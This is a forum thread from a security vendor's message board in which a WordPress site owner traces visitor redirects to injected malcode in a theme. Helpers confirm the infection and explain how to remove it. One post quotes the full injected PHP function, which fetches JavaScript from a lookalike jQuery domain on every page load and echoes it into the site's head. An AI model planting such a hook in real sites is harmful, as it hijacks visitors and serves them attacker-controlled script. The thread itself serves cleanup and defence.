Avast WEBforum
Other => Viruses and worms => Topic started by: geryeo on August 23, 2012, 11:42:10 PM
-
Hello,
i just started a new website few weeks ago, use wordpress + goodnews 3.4 theme. But yesterday when i clicked on a post "something" redirected me to this strange website: downloadmusicfreenow.com.
I cant figure out what can be infected... Please help me fix this.
Thank you!
-
Hi geryeo,
Can you provide the specific post you were on? Use hXtp:// instead of http://.
~!Donovan
-
Hi geryeo,
Wait for !Donovan to sort this out, but consider these WOT web rep results: http://www.mywot.com/en/scorecard/downloadmusicfreenow.com?utm_source=addon&utm_content=popup-donuts site is given as a malvertiser, so that is likely what will be turned up...
For your site I get a WordPress alert Web application version:
WordPress version: WordPress
Wordpress Version 3.3 or 3.4 based on: htxp://danongonline.net/wp-includes/js/autosave.js
WordPress theme: htxp://danongonline.net/wp-content/themes/goodnews34/
Wordpress internal path: /home/ducvan/public_html/danongonline.net/wp-content/themes/goodnews34/index.php
Therev could be a code issue here:
s.gravatar.com/js/gprofiles.js?aa&ver=3.4.1 benign
[nothing detected] (script) s.gravatar.com/js/gprofiles.js?aa&ver=3.4.1
status: (referer=danongonline.net/)saved 23917 bytes 54d6e2713dbe666dfb1c9339d1550616c2204807
info: [img] s.gravatar.com/js/
info: [decodingLevel=0] found JavaScript
suspicious:
For further website security issues, see: http://net.saferpage.de/danongonline
polonus
-
@Donovan Sorry, I don't remember that post...
But I found in the theme folder .../post.php this part of code which looks very strange: ... jquerye.com/jquery-1.6.3.min.js ...
Shouldn't there be jquery.com?
Is there any good malware scanner site where i can upload the theme (think there is the problem) and check it?
Thanks
-
Yes gereyo, that is malcode. !Donovan reported a similar case in another thread...jqueries was used there (plural), apparently they are variations on the same injected malcode theme,
polonus
-
Ok, so now i just need to delete that part with ...jquerye.com/jquery-1.6.3.min.js... to solve it?
Thanks polonus
-
Hi geryeo,
You are welcome. Here what Sucuri Blog had on this: http://blog.sucuri.net/2012/07/fake-jquery-website-serving-redirection-malware.html
blog article author = dre armeda
polonus
-
Just to leave this as a reference for all who have similar problem:
The code that I had in my wordpress website was inside the theme folder in a file called functions.init.php and it looked like that:
if (!function_exists('insert_jquery_slider')) {
function insert_jquery_slider ()
{
if (function_exists('curl_init')) {
$url = "http://www.jquerye.com/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$data = curl_exec($ch);
curl_close($ch);
echo $data;
}
}
add_action('wp_head', 'insert_jquery_slider');
}
If you ever happened to be in the same place, this is how to solve this:
Just search in all your files by text and look for “jquerye” or even better for “insert_jquery_slider” or any of the patters you see in the piece of code above. That should point you where you need! (hint: just remove the whole function)
-
Hi RamyNasr,
We thank you very much for the solutions you found. Glad we could help to arrive there. Stay safe and secure,
polonus
-
Hi, I don't know if I'm a little late to post in here regarding this issue. I am having the same problem. I am trying to edit
<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquery.com";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>
I just don't know what part to take out exactly. When mentioned one person said to remove the function, I just need to know exactly what part of the code is the function, as I am totally new to this stuff....I have tried taking certain parts of it out, and I just mess things up. Any help will be greatly appreciated! Thank you in advance.
-
Everything that you posted is part of the function. Did you try removing the whole line?
Also: The code you provide says jquery.com, not jquerye.com. Is there any specific reason why you want to remove this?
~!Donovan